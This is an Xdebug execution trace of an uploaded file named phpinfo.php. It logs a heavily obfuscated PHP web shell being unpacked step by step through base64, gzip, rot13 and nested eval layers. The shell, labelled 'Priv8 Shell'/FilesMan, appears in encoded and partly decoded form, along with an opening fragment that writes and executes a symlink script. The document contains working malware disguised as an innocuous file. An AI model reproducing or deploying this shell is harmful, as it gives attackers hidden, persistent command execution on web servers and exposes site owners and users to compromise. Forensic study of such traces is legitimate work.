base64_decode(\$sym_script));\r\nchmod(\$file_sym, 0755);\r\n\$khoer = exec(\"python sym.py\");\r\necho \"<br><center><font color='white'>Done ...</font> <a href='priv_sympy/sym/' target='_blank'><font color='red'>Click Here</font> </a>\";\r\n die;\r\n}\r\n// xd\r\nif( empty(\$_POST['a']) )\r\n\tif(isset(\$\xe2\x96\x9a) && function_exists('action' . \$\xe2\x96\x9a))\r\n\t\t\$_POST['a'] = \$\xe2\x96\x9a;\r\n\telse\r\n\t\t\$_POST['a'] = 'FilesMan';\r\nif( !empty(\$_POST['a']) && function_exists('action' . \$_POST['a']) )\r\n\tcall_user_func('action' . \$_POST['a']);\r\n?>");
};
exit;
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:43:40.111287]
1 0 1 0.000206 393528
1 3 0 0.000729 468248 {main} 1 /var/www/html/uploads/phpinfo.php 0 0
1 A /var/www/html/uploads/phpinfo.php 2 $▛ = '99754106633f94d350db34d548d6091a'
1 A /var/www/html/uploads/phpinfo.php 3 $xD = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEhFeCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1 A /var/www/html/uploads/phpinfo.php 3 $HEx = '=oV5bwN/F0b/B0///f9+z/97yXMV+5Hf2c058zt/5e05ojB/4TvJq8vf/dKYxEDLrULM7T/ISjA8dDk+dV2hV6CLNN9afUL3RrxgNoK6oLup7El3eEbeiKYTi+cODvSyvgSw5PsDnY3BCkBsjRhx25y5nih9T/+W7WaakYfN6NfbukAVv/yrPImJKCpeTnVE7UarxyloG/u2QFJpp5V+czaPWr2MDU6HlOE1eFayISx9v8KvEN3DlfzRwzwkPOHfRor6J3HL8qEE2ryjewFZjG8KPCrGRT0i1onC2ssCIf5Il5dAWUQQVllU352T7WDVEYhUwnMTj6p8q0L+oMmzRo+jOIqb97ckKEzs5XPVJakCwunJ26TpHbfxLT2QuyHTeeRUYHAv4+ADWhrA7GvBZACBPH9Zu5ZgeLHRE9tTkOnsqbig2IvRQJyBL5zOEjann6JBIUnY5ejjYgSIR6IFZL/bwQJYXbjc2mpZPVCB6bVRCoi6U98U0NtDmXQK6242'
2 4 0 0.000850 468248 base64_decode 0 /var/www/html/uploads/phpinfo.php 3 1 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEhFeCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2 4 1 0.000873 468536
2 4 R 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24HEx%29%29%29%29%29%29%29%29%3B'
2 5 0 0.000894 468504 urldecode 0 /var/www/html/uploads/phpinfo.php 3 1 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24HEx%29%29%29%29%29%29%29%29%3B'
2 5 1 0.000914 468728
2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($HEx))))))));'
2 6 0 0.000932 468440 htmlspecialchars_decode 0 /var/www/html/uploads/phpinfo.php 3 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($HEx))))))));'
2 6 1 0.000951 468664
2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($HEx))))))));'
2 7 0 0.000981 470784 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($HEx))))))));' /var/www/html/uploads/phpinfo.php 3 0
3 8 0 0.000998 470784 strrev 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code 1 1 '=oV5bwN/F0b/B0///f9+z/97yXMV+5Hf2c058zt/5e05ojB/4TvJq8vf/dKYxEDLrULM7T/ISjA8dDk+dV2hV6CLNN9afUL3RrxgNoK6oLup7El3eEbeiKYTi+cODvSyvgSw5PsDnY3BCkBsjRhx25y5nih9T/+W7WaakYfN6NfbukAVv/yrPImJKCpeTnVE7UarxyloG/u2QFJpp5V+czaPWr2MDU6HlOE1eFayISx9v8KvEN3DlfzRwzwkPOHfRor6J3HL8qEE2ryjewFZjG8KPCrGRT0i1onC2ssCIf5Il5dAWUQQVllU352T7WDVEYhUwnMTj6p8q0L+oMmzRo+jOIqb97ckKEzs5XPVJakCwunJ26TpHbfxLT2QuyHTeeRUYHAv4+ADWhrA7GvBZACBPH9Zu5ZgeLHRE9tTkOnsqbig2IvRQJyBL5zOEjann6JBIUnY5ejjYgSIR6IFZL/bwQJYXbjc2mpZPVCB6bVRCoi6U98U0NtDmXQK6242'
3 8 1 0.001085 544544
3 8 R 'AA+A8H8ADoDxfwAJgPZ/eJwACYD2f3iclJ3Hjutcm53nBnwPPxo944A5wTYM5pwpMaAnzJkUc7h6s/w1et4DnjqQStTm3u+71npYFPW//+9P/v3P//Hv6/av//Ovf/uPi0TfDXs35D8uvPznJ1H+8xgKvxv6b//rX/9ePf/8NkG+zyTvT/rdincj3i17N/ifVxD432+vG/Lf2Xm6/ufOkf/cEfq3o/fZd+co9s8rCeyfxwj0nz0Q//VmdXH9vRy30SUuTH9tOQ08Em2Q5moLIPMXJrC0c30AXPUWZR7jKN3pr2q3JCBf86Z1dpzIdBxlt0c5OV8cv5qvfHXjQIC3dEu054wr8WsxWBUL8lmBMgkWN1Jh/rMY9/po9/GQZPyUV9+ov1J9wg8ky3BX00eXcMpBl5smg+AdjZSNrvqjE74gifhABXOxls3ty6NBZE6Rw9SwLRmut1bmlP4PN7YNOBpMyseEXhohm+gJhtaCtvX5AMkHxAMsEHsfOlGaHkFu'
3 9 0 0.001155 544512 base64_decode 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code 1 1 'AA+A8H8ADoDxfwAJgPZ/eJwACYD2f3iclJ3Hjutcm53nBnwPPxo944A5wTYM5pwpMaAnzJkUc7h6s/w1et4DnjqQStTm3u+71npYFPW//+9P/v3P//Hv6/av//Ovf/uPi0TfDXs35D8uvPznJ1H+8xgKvxv6b//rX/9ePf/8NkG+zyTvT/rdincj3i17N/ifVxD432+vG/Lf2Xm6/ufOkf/cEfq3o/fZd+co9s8rCeyfxwj0nz0Q//VmdXH9vRy30SUuTH9tOQ08Em2Q5moLIPMXJrC0c30AXPUWZR7jKN3pr2q3JCBf86Z1dpzIdBxlt0c5OV8cv5qvfHXjQIC3dEu054wr8WsxWBUL8lmBMgkWN1Jh/rMY9/po9/GQZPyUV9+ov1J9wg8ky3BX00eXcMpBl5smg+AdjZSNrvqjE74gifhABXOxls3ty6NBZE6Rw9SwLRmut1bmlP4PN7YNOBpMyseEXhohm+gJhtaCtvX5AMkHxAMsEHsfOlGaHkFu'
3 9 1 0.001385 618272
3 9 R '\000\017��\000\016��\000\t��x�\000\t��x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\0'
3 10 0 0.002388 544512 gzinflate 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code 1 1 '\000\017��\000\016��\000\t��x�\000\t��x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\0'
3 10 1 0.003408 597792
3 10 R '\000\016��\000\t��x�\000\t��x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\020{\037:Q�\'
3 11 0 0.004399 524032 gzinflate 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code 1 1 '\000\016��\000\t��x�\000\t��x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\020{\037:Q�\'
3 11 1 0.005406 577312
3 11 R '\000\t��x�\000\t��x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\020{\037:Q�\036An\003ܑ'
3 12 0 0.006397 524032 gzinflate 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code 1 1 '\000\t��x�\000\t��x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\020{\037:Q�\036An\003ܑ'
3 12 1 0.007392 577312
3 12 R 'x�\000\t��x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\020{\037:Q�\036An\003ܑ:��\022'
3 13 0 0.008379 524032 gzuncompress 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code 1 1 'x�\000\t��x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\020{\037:Q�\036An\003ܑ:��\022'
3 13 1 0.009699 577312
3 13 R 'x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\020{\037:Q�\036An\003ܑ:��\022���\020��\t'
3 14 0 0.010762 524032 gzuncompress 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code 1 1 'x���ǎ�\\���\006|\017?\032=�9�6\f�)1�\'̙\024s�z��5z�\003�:�J�����zX\024����O�����������D�\r{7�?.���\'Q��\030\n�\033�o��_�^=��6A��$�O�݊w#�-{7��W\020��o�\033���y���Α��\021�����w�(��+\t��\b�=\020��fuq��\034��%.Lm9\r<\022m��j\v �\027&��s}\000\\�\026e\036�(��j�$ _�uv��t\034e�G99_\034���|u�@��tK��+�k1X\025\v�Y�2\t\0267Ra��\030��h��d��Wߨ�R}�\017$�pW�G�p�A��&��\035������\023� ��@\005s����ˣAdN��-\031��V�\0177�\r8\032L�DŽ^\032!��\t�ւ���\000�\a�\003,\020{\037:Q�\036An\003ܑ:��\022���\020��\t'
3 14 1 0.011988 593696
3 14 R '<?pHp\r\n$st = "\\x73\\x74\\x72\\x5f\\x72\\x6f\\x74\\x31\\x33"; $gz = "\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61\\x74\\x65"; $st2 = "\\x73\\x74\\x72\\x5f\\x72\\x6f\\x74\\x31\\x33"; $bs = "\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65"; $hex = "5P3rZeNTsjCK/vaKmGqgtW0NpXa1GuClW+xhtYcSAQIkwTsJkra/DhDNOwkCFAkC8PjvfoQV55xiVHxknm6/yGyG9SQns6pj41JFe7zs+faWrRYJ1DUrMyszKyvz77ZzfxliJpfJzXU0HH1kh9vkaCIv9ftKH//yYn8P3sLzL6TEGF5m8WqesfiyTHnM6cQed18mtrc5LjOcQfTp5Mtt+vi4Gdna9riEco9o10se9PLqv/7z/5W4WFlT0w399n'
3 15 0 0.012480 612232 eval 1 '?><?pHp\r\n$st = "\\x73\\x74\\x72\\x5f\\x72\\x6f\\x74\\x31\\x33"; $gz = "\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61\\x74\\x65"; $st2 = "\\x73\\x74\\x72\\x5f\\x72\\x6f\\x74\\x31\\x33"; $bs = "\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65"; $hex = ""; eval($st($gz($st2($bs(($hex)))))); ?>' /var/www/html/uploads/phpinfo.php(3) : eval()'d code 1 0
3 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 $st = 'str_rot13'
3 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 $gz = 'gzinflate'
3 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 $st2 = 'str_rot13'
3 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 $bs = 'base64_decode'
3 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 $hex = '5P3rZeNTsjCK/vaKmGqgtW0NpXa1GuClW+xhtYcSAQIkwTsJkra/DhDNOwkCFAkC8PjvfoQV55xiVHxknm6/yGyG9SQns6pj41JFe7zs+faWrRYJ1DUrMyszKyvz77ZzfxliJpfJzXU0HH1kh9vkaCIv9ftKH//yYn8P3sLzL6TEGF5m8WqesfiyTHnM6cQed18mtrc5LjOcQfTp5Mtt+vi4Gdna9riEco9o10se9PLqv/7z/5W4WFlT0w399n/Ct+Rn8vjmNlYf/H/wTstpN+OBobF0/2Jr5kzZy0pfxKYgN4Ufk51v8eGLBN++R9vNfDH5MzZhPyYuv7fH2P2rL/X7+163+eOJd517ESvcXDib5cXPSkqJX/7yYt/po+FxOEzqm8vnd1wnY1HY369/+Tfs9GXj6ZMl1GyAbz8mzZ0xgiFA+St19+gpWQWnfThcTVfbJP0BTrvxagZsFfkGLdnmQ5tdXhD44cAOO7tBSxtmtNRwrVx/C2M+nhqKGRuK'
4 16 0 0.014867 612232 base64_decode 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 1 '5P3rZeNTsjCK/vaKmGqgtW0NpXa1GuClW+xhtYcSAQIkwTsJkra/DhDNOwkCFAkC8PjvfoQV55xiVHxknm6/yGyG9SQns6pj41JFe7zs+faWrRYJ1DUrMyszKyvz77ZzfxliJpfJzXU0HH1kh9vkaCIv9ftKH//yYn8P3sLzL6TEGF5m8WqesfiyTHnM6cQed18mtrc5LjOcQfTp5Mtt+vi4Gdna9riEco9o10se9PLqv/7z/5W4WFlT0w399n/Ct+Rn8vjmNlYf/H/wTstpN+OBobF0/2Jr5kzZy0pfxKYgN4Ufk51v8eGLBN++R9vNfDH5MzZhPyYuv7fH2P2rL/X7+163+eOJd517ESvcXDib5cXPSkqJX/7yYt/po+FxOEzqm8vnd1wnY1HY369/+Tfs9GXj6ZMl1GyAbz8mzZ0xgiFA+St19+gpWQWnfThcTVfbJP0BTrvxagZsFfkGLdnmQ5tdXhD44cAOO7tBSxtmtNRwrVx/C2M+nhqKGRuK'
4 16 1 0.015097 681896
4 16 R '��e�S�0�����j��m\r�v�\032�[�a��\022\001\002$�;\t���\016\020�;\t\002\024\t\002��~�\025�bT|d�n��l��$\'��c�RE{����\026\t�5+3+3++��s\031b&���u4\034}d���h"/��J\037��b\017���/��\030^f�j����Ly���\036w_&��9.3�A����m���\031����r�h�K\036����XYS�\r��·�g��6V\037��N�i7ち�t�bk�L��J_Ħ 7�\037��o��\004߾G��|1�36a?&.�����/���^���w�{\021+�\\8����JJ�_��b���q8L���w\\\'cQ�߯�7��e��%�l�o?&͝1�!@�+u��)Y\005�}8\\MW�$�\001N��j\006l\025�\006-��C�]^\020��\016;�AK\033f��p�\\\vc>�\032�\031\033��\033�o�\036P'
4 17 0 0.016028 681864 str_rot13 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 1 '��e�S�0�����j��m\r�v�\032�[�a��\022\001\002$�;\t���\016\020�;\t\002\024\t\002��~�\025�bT|d�n��l��$\'��c�RE{����\026\t�5+3+3++��s\031b&���u4\034}d���h"/��J\037��b\017���/��\030^f�j����Ly���\036w_&��9.3�A����m���\031����r�h�K\036����XYS�\r��·�g��6V\037��N�i7ち�t�bk�L��J_Ħ 7�\037��o��\004߾G��|1�36a?&.�����/���^���w�{\021+�\\8����JJ�_��b���q8L���w\\\'cQ�߯�7��e��%�l�o?&͝1�!@�+u��)Y\005�}8\\MW�$�\001N��j\006l\025�\006-��C�]^\020��\016;�AK\033f��p�\\\vc>�\032�\031\033��\033�o�\036P'
4 17 1 0.017050 735144
4 17 R '��r�F�0�����w��z\r�i�\032�[�n��\022\001\002$�;\t���\016\020�;\t\002\024\t\002��~�\025�oG|q�a��y��$\'��p�ER{����\026\t�5+3+3++��f\031o&���h4\034}q���u"/��W\037��o\017���/��\030^s�w����Yl���\036j_&��9.3�N����z���\031����e�u�X\036����KLF�\r��·�t��6I\037��A�v7ち�g�ox�Y��W_Ħ 7�\037��b��\004߾T��|1�36n?&.�����/���^���j�{\021+�\\8����WW�_��o���d8Y���j\\\'pD�߯�7��r��%�y�b?&͝1�!@�+h��)L\005�}8\\ZJ�$�\001A��w\006y\025�\006-��P�]^\020��\016;�NX\033s��c�\\\vp>�\032�\031\033��\033�b�\036C'
4 18 0 0.017982 665480 gzinflate 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 1 '��r�F�0�����w��z\r�i�\032�[�n��\022\001\002$�;\t���\016\020�;\t\002\024\t\002��~�\025�oG|q�a��y��$\'��p�ER{����\026\t�5+3+3++��f\031o&���h4\034}q���u"/��W\037��o\017���/��\030^s�w����Yl���\036j_&��9.3�N����z���\031����e�u�X\036����KLF�\r��·�t��6I\037��A�v7ち�g�ox�Y��W_Ħ 7�\037��b��\004߾T��|1�36n?&.�����/���^���j�{\021+�\\8����WW�_��o���d8Y���j\\\'pD�߯�7��r��%�y�b?&͝1�!@�+h��)L\005�}8\\ZJ�$�\001A��w\006y\025�\006-��P�]^\020��\016;�NX\033s��c�\\\vp>�\032�\031\033��\033�b�\036C'
4 18 1 0.019398 821160
4 18 R '@vav_frg(\'reebe_ybt\', AHYY);\r\n@vav_frg(\'ybt_reebef\', 0);\r\n@vav_frg(\'znk_rkrphgvba_gvzr\', 0);\r\n@vav_frg(\'bhgchg_ohssrevat\', 0);\r\n@vav_frg(\'qvfcynl_reebef\', 0);\r\n$▘ = gehr;\r\n$▜ = \'hgs-8\';\r\n$▚ = \'SvyrfZna\';\r\n$▙ = zq5($_FREIRE[\'UGGC_HFRE_NTRAG\']);\r\nvs (!vffrg($_PBBXVR[zq5($_FREIRE[\'UGGC_UBFG\'])."xrl"])) {\r\n\tcebgbglcr(zq5($_FREIRE[\'UGGC_UBFG\'])."xrl", $▙);\r\n}\r\n\r\nvs(rzcgl($_CBFG[\'punefrg\']))\r\n\t$_CBFG[\'punefrg\'] = $▜;\r\nvs (!vffrg($_CBFG[\'ar\'])) '
4 19 0 0.019625 767880 str_rot13 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code 2 1 '@vav_frg(\'reebe_ybt\', AHYY);\r\n@vav_frg(\'ybt_reebef\', 0);\r\n@vav_frg(\'znk_rkrphgvba_gvzr\', 0);\r\n@vav_frg(\'bhgchg_ohssrevat\', 0);\r\n@vav_frg(\'qvfcynl_reebef\', 0);\r\n$▘ = gehr;\r\n$▜ = \'hgs-8\';\r\n$▚ = \'SvyrfZna\';\r\n$▙ = zq5($_FREIRE[\'UGGC_HFRE_NTRAG\']);\r\nvs (!vffrg($_PBBXVR[zq5($_FREIRE[\'UGGC_UBFG\'])."xrl"])) {\r\n\tcebgbglcr(zq5($_FREIRE[\'UGGC_UBFG\'])."xrl", $▙);\r\n}\r\n\r\nvs(rzcgl($_CBFG[\'punefrg\']))\r\n\t$_CBFG[\'punefrg\'] = $▜;\r\nvs (!vffrg($_CBFG[\'ar\'])) '
4 19 1 0.019908 923560
4 19 R '@ini_set(\'error_log\', NULL);\r\n@ini_set(\'log_errors\', 0);\r\n@ini_set(\'max_execution_time\', 0);\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\n$▘ = true;\r\n$▜ = \'utf-8\';\r\n$▚ = \'FilesMan\';\r\n$▙ = md5($_SERVER[\'HTTP_USER_AGENT\']);\r\nif (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"])) {\r\n\tprototype(md5($_SERVER[\'HTTP_HOST\'])."key", $▙);\r\n}\r\n\r\nif(empty($_POST[\'charset\']))\r\n\t$_POST[\'charset\'] = $▜;\r\nif (!isset($_POST[\'ne\'])) '
4 20 0 0.023312 1377144 eval 1 '@ini_set(\'error_log\', NULL);\r\n@ini_set(\'log_errors\', 0);\r\n@ini_set(\'max_execution_time\', 0);\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\n$▘ = true;\r\n$▜ = \'utf-8\';\r\n$▚ = \'FilesMan\';\r\n$▙ = md5($_SERVER[\'HTTP_USER_AGENT\']);\r\nif (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"])) {\r\n\tprototype(md5($_SERVER[\'HTTP_HOST\'])."key", $▙);\r\n}\r\n\r\nif(empty($_POST[\'charset\']))\r\n\t$_POST[\'charset\'] = $▜;\r\nif (!isset($_POST[\'ne\'])) {\r\n\tif(isset($_POST[\'a\'])) $_POST[\'a\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'a\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'c\'])) $_POST[\'c\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'c\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p1\'])) $_POST[\'p1\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p1\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p2\'])) $_POST[\'p2\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p2\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p3\'])) $_POST[\'p3\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p3\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n}\r\n$hex = "SJBEWMMwFIWf/RfHQ8gKzrHnplKmYXuUKqKMRJrQpdORtSkJJrL/YdrqcUK55H7nnnuu7SZpt9NlEhUv+XdQnPpjn3Ebx7j6BmdwOCgz0ruMHWx7yEvHKw+vpeF6bb9LrqDLUx6EQYmvnbRPSGXWM9NJVlKgGnZsmRKSMVuKTW9xO+s0Tql8qFTLi/6uPm0rsUquDsBNhO4wNDzjFrNuJZpRgxgp7qLi+fU9X54TJAB5h8lVeVXvUra4QU52jJAt6nfnhJImqKPiMX9L58tjgP4nY7e4FCbjNM/3uqiF46rVetGn+DOg0ouidOn25n9pPEvh95KEmWzGFFmlu5SeIZot3qZCzjZfMLrS13mm+oTzjCQ4nWP6AQ==";\r\neval(str_rot13(gzinflate(str_rot13(base64_decode(($hex))))));\r\n$xd = "fZFieMIwEIffD/YdjkVjA6lwr1HZn6Y02faizJYKaY4SJVNkcfYwoemnt7XIQEpf5bi75+H4BVyNW2sCVKtdieJuOHx83UrKS2K3qJzx7Q24v3dyWtnsJIs1L9rmtjg2jFIIlNQwAgc8Y2Yah+9k+NWbkM+3LPZMHhLCbd/1zJmLOT/BXg1GFBsUEBWV4Rd8++bRJJv6SmSyUaGk4XugPyuJSJeJkoR9UW7cIdN1LcwML3heWLkcDQb/d/woeBV/kyAN6m2WZ5iNxIubRcaCPCX0PJkm+LvmVPqn2PuN534ML88H";\r\neval(str_rot13(gzinflate(str_rot13(base64_decode(($xd))))));\r\n$configs = "KytJ0ChYWCtX10OJag1l8QhlZo9JL6hFj9XUR6jm5UUAgqKC0iQFJZvk1CI7JXiIkFdOlYKtAoYWqHlNQU1tRJUGQxFZBHeEPrIZhXJSQEmtgr0dAA==";\r\neval(str_rot13(gzinflate(str_rot13(base64_decode(($configs))))));\r\n\r\nfunction decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\nif(version_compare(PHP_VERSION, \'5.3.0\', \'<\')){\r\n set_magic_quotes_runtime(0);\r\n}\r\n@define(\'VERSION\', \'Priv8 Shell\');\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction stripslashes_array($array) {\r\n\t\treturn is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n\t}\r\n\t$_POST = stripslashes_array($_POST);\r\n $_COOKIE = stripslashes_array($_COOKIE);\r\n}\r\n/* (С) 11.2011 oRb */\r\nif(!empty($▛)) {\r\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $▛))\r\n 